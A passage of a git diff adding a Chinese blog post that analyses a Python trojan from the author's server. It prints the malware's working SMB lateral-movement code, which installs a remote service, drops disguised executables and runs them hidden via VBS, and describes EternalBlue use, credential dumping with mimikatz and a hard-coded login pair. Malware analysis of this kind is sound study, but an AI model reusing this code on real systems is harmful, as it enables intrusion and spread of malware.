+ def __init__(self, copyFile=None, exeFile=None, cmd='', username='', password='', domain='', fr='', hashes=None, aesKey=None, doKerberos=False):
+ self.__username = username
+ self.__password = password
+ self.__protocols = PSEXEC.KNOWN_PROTOCOLS.keys()
+ self.__command = cmd
+ self.__domain = domain
+ self.__fr = fr
+ self.__lmhash = ''
+ self.__nthash = ''
+ self.__path = None
+ self.__aesKey = aesKey
+ self.__exeFile = exeFile
+ self.__copyFile = copyFile
+ self.__doKerberos = doKerberos
+ if hashes is not None:
+ self.__lmhash, self.__nthash = hashes.split(':')
+ return
+
+ def run(self, addr):
+ for protocol in self.__protocols:
+ protodef = PSEXEC.KNOWN_PROTOCOLS[protocol]
+ port = protodef[1]
+ logging.info('Trying protocol %s...\n' % protocol)
+ stringbinding = protodef[0] % addr
+ rpctransport = transport.DCERPCTransportFactory(stringbinding)
+ rpctransport.set_dport(port)
+ if hasattr(rpctransport, 'set_credentials'):
+ rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
+ rpctransport.set_kerberos(self.__doKerberos)
+ self.doStuff(rpctransport)
+
+ def openPipe(self, s, tid, pipe, accessMask):
+ pipeReady = False
+ tries = 50
+ while pipeReady is False and tries > 0:
+ try:
+ s.waitNamedPipe(tid, pipe)
+ pipeReady = True
+ except:
+ tries -= 1
+ time.sleep(2)
+
+ if tries == 0:
+ logging.critical('Pipe not ready, aborting')
+ raise
+ fid = s.openFile(tid, pipe, accessMask, creationOption=64, fileAttributes=128)
+ return fid
+
+ def connectPipe(rpctransport, pipe, permisssions):
+ transport = rpctransport
+ server = SMBConnection('*SMBSERVER', transport.get_smb_connection().getRemoteHost(), sess_port=transport.get_dport(), preferredDialect=dialect)
+ user, passwd, domain, lm, nt, aesKey, TGT, TGS = transport.get_credentials()
+ if transport.get_kerberos() is True:
+ server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
+ else:
+ server.login(user, passwd, domain, lm, nt)
+ tid = server.connectTree('IPC$')
+ server.waitNamedPipe(tid, pipe)
+ fid = self.server.openFile(tid, pipe, permissions, creationOption=64, fileAttributes=128)
+ server.setTimeout(6000)
+ return server
+
+ def doStuff(self, rpctransport):
+ global LastDataSent
+ global dialect
+ dce = rpctransport.get_dce_rpc()
+ try:
+ dce.connect()
+ except Exception as e:
+ return False
+
+ dialect = rpctransport.get_smb_connection().getDialect()
+ try:
+ unInstalled = False
+ s = rpctransport.get_smb_connection()
+ s.setTimeout(30000)
+ installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())
+ installService.install()
+ if self.__copyFile:
+ try:
+ installService.copy_file(self.__copyFile, installService.getShare(), 'temp\\svchost.exe')
+ except:
+ print 'file exist'
+
+ tid = s.connectTree('IPC$')
+ fid_main = self.openPipe(s, tid, '\\RemCom_communicaton', 1180063)
+ packet = RemComMessage()
+ pid = os.getpid()
+ packet['Machine'] = ('').join([random.choice(string.letters) for _ in range(4)])
+ packet['ProcessID'] = pid
+ if self.__exeFile:
+ if self.__fr == '1':
+ installService.copy_file(self.__exeFile, installService.getShare(), 'temp\\updll.exe')
+ self.__command = self.__command.replace('"', '""')
+ vbs_cmd = '\n Set ws = CreateObject("WScript.Shell")\n ws.Run "%s",0\n Set ws = CreateObject("WScript.Shell")\n ws.Run "..\\\\temp\\\\updll.exe",0 \n ' % self.__command
+ elif self.__fr == '3':
+ installService.copy_file(self.__exeFile, installService.getShare(), 'temp\\setup-install.exe')
+ self.__command = self.__command.replace('"', '""')
+ vbs_cmd = '\n Set ws = CreateObject("WScript.Shell")\n ws.Run "%s",0\n Set ws = CreateObject("WScript.Shell")\n ws.Run "..\\\\temp\\\\setup-install.exe",0 \n ' % self.__command
+ else:
+ installService.copy_file(self.__exeFile, installService.getShare(), 'temp\\upinstalled.exe')
+ self.__command = self.__command.replace('"', '""')
+ vbs_cmd = '\n Set ws = CreateObject("WScript.Shell")\n ws.Run "%s",0\n Set ws = CreateObject("WScript.Shell")\n ws.Run "..\\\\temp\\\\upinstalled.exe",0 \n ' % self.__command
+ installService.copy_file(StrReader(vbs_cmd.strip()), installService.getShare(), 'temp\\tmp.vbs')
+ self.__command = 'cmd /c call "c:\\windows\\temp\\tmp.vbs"'
+ packet['Command'] = self.__command
+ print self.__command
+ s.writeNamedPipe(tid, fid_main, str(packet))
+ LastDataSent = ''
+ stdin_pipe = RemoteStdInPipe(rpctransport, '\\%s%s%d' % (RemComSTDIN, packet['Machine'], packet['ProcessID']), smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare())
+ stdin_pipe.start()
+ stdout_pipe = RemoteStdOutPipe(rpctransport, '\\%s%s%d' % (RemComSTDOUT, packet['Machine'], packet['ProcessID']), smb.FILE_READ_DATA)
+ stdout_pipe.start()
+ stderr_pipe = RemoteStdErrPipe(rpctransport, '\\%s%s%d' % (RemComSTDERR, packet['Machine'], packet['ProcessID']), smb.FILE_READ_DATA)
+ stderr_pipe.start()
+ time.sleep(1)
+ installService.uninstall()
+ s.deleteFile(installService.getShare(), 'temp\\tmp.vbs')
+ unInstalled = True
+ return True
+ except SystemExit:
+ return False
+ except:
+ if unInstalled is False:
+ time.sleep(1)
+ installService.uninstall()
+ s.deleteFile(installService.getShare(), 'temp\\tmp.vbs')
+ return False
+```
+
+# 行为分析
+ 那这个代码都干了些什么呢?首先动态分析一下吧,我用微步云沙箱检查了一下,不过好像有人已经上传过了,[这个是报告](https://s.threatbook.com/report/file/60b6d7664598e6a988d9389e6359838be966dfa54859d5cb1453cbc9b126ed7d)。好像也没啥特别的,先给445端口开了个防火墙,估计是防止其他人利用永恒之蓝入侵,然后整了几个请求几个“beahh.com”域名的定时任务,另外就是同网段扫描啥的,应该是找其他机器继续尝试用漏洞入侵感染这个木马。
+ 之后再看看代码,干的基本上确实是这些事情,主要就是利用永恒之蓝漏洞然后各种扫描,似乎有创假的系统用户的操作,不过没太看懂,扫描的时候除了用漏洞和弱密码之外好像还用了个“k8h3d:k8d3j9SjfS7”的用户?这是连别家的僵尸网络的节点吧,入侵完还给它删了🤣,还有加定时任务,然后用mimikatz把这台机器的密码存到“c:\windows\temp\mkatz.ini”这个文件里,扫描的时候也使用这里获取的密码,可能是考虑有些集群全都用一样的用户名和密码吧。木马的作者应该会利用那些定时任务发布指令,有可能会把密码拿走或者干别的事情吧。
+ 不过定时任务里写的那个地址已经访问不到了(就连获取IP的接口也请求不通了),我在网上搜了一下看行为应该是这个[搞门罗币挖矿的木马](https://blog.checkpoint.com/2019/03/19/check-point-forensic-files-monero-cryptominer-campaign-cryptojacking-crypto-apt-hacking/),代码里没有体现,有可能是那个域名对应的远控服务器干的。不过这篇文章是2019年的,估计作者已经进去了吧,所以访问不到服务器😂,但是5年过去了,他的木马还在忠实的为他寻找肉鸡并等待他发布指令😭,这就是僵尸网络的魅力吧。
+
+# 感想
+ 用Python写的木马也挺有意思啊,这个代码中用到“[impacket](https://github.com/fortra/impacket)”库我还是头一次了解,看起来可以封装各种各样的网络包,感觉说不定会有项目能用得上,看这个代码也是学到了啊……
+ 如果我能有属于自己的僵尸网络能不能让我的项目永存呢?不过这些感染了木马的老服务器总有一天会被淘汰掉,新的服务器肯定不会装Windows Server 2008这样超老的系统 ~~(我除外🤣)~~ ,而且现在新的系统漏洞越来越少了,想要出现像当年永恒之蓝那样的漏洞估计不太可能了,在未来估计就不会存在僵尸网络了……所以这还是做不到永存啊…… \ No newline at end of file
generated by cgit v1.2.3 (git 2.25.1) at 2025-08-16 13:21:35 +0200